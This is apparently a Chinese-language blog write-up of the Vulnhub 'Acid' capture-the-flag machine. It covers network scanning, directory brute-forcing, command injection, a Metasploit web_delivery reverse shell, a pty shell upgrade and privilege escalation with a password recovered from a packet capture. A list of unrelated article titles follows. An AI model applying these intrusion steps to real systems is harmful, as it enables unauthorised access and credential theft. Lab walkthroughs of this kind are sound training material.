Vulnhub Acid
1、信息收集
1.1、netdiscover
netdiscover -i eth0 -r 192.168.118.0/24
1.2、 Nmap
nmap -sP -T4 192.168.118.0/24
nmap -sS -T4 -sV -O -p- 192.168.118.146
1.3 33447
view-source:http://192.168.118.146:33447/
643239334c6d70775a773d3d ==》 wow.jpg
1.4 wow.jpg
notepad++ 打开
3761656530663664353838656439393035656533376631366137633631306434
==》
7aee0f6d588ed9905ee37f16a7c610d4
7aee0f6d588ed9905ee37f16a7c610d4
MD5 解密==》63425 (后面发现并没什么卵用)
1.5 dirbuster爆破
标题俩个路径:
http://192.168.118.146:33447/Challenge/
http://192.168.118.146:33447/Challenge/cake.php
==>
/Magic_Box
再次爆破目录:
http://192.168.118.146:33447/Challenge/Magic_Box/command.php
2、漏洞挖掘
命令注入:
http://192.168.118.146:33447/Challenge/Magic_Box/command.php
3、 反弹shell
3.1、请移步:web_delivery
use exploit/multi/script/web_delivery
su: must be run from a terminal
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
4、权限提升
cat /etc/passwd,发现需要关注的用户有:acid,saman,root
find / -user acid 2>/dev/null
发一个hint.pcapng
打开后跟踪tcp流
发现saman的密码:1337hax0r
su提权到saman、root,获得flag
再使用sudo -i 提权到root,密码同样是1337hax0r,获得位于root目录的flag.txt
notepad:
1、查找acid用户的文件
find / -user acid 2>/dev/null
2、使用metasploit反弹shell
exploit/multi/script/web_delivery
最新文章
- mysql:The total number of locks exceeds the lock table size
- Spring AOP + AspectJ annotation example
- 用对象型泛型和ArraysList写一个输入学员信息并展示
- Raft、Zab
- 利用OpenXml生成Word2007文档
- PowerDesigner一些小技巧
- js判断是否全是相同的字符串
- 一句代码,更加优雅的调用KVO和通知
- linux下切割catalina.out文件,按天生成文件
- Java - 字符串和Unicode互转 - 解析小米pm.min.js
- VR全景智慧城市-提前进入商家观景,涵盖实体行业
- Dinic算法详解及实现
- centos7 防火墙 配置
- 小白的Python之路 day1 用户输入
- Atlantis HDU - 1542 (扫描线,线段树)
- VS2008中 ATL CLR MFC Win32 区别
- Codeforces Round #498 (Div. 3)
- I - 取石子游戏
- Cracking the Coding Interview(linked list)
- RobotCraft 2017 第二届国际机器人学暑期学校 2nd Edition of International Robotics Summer School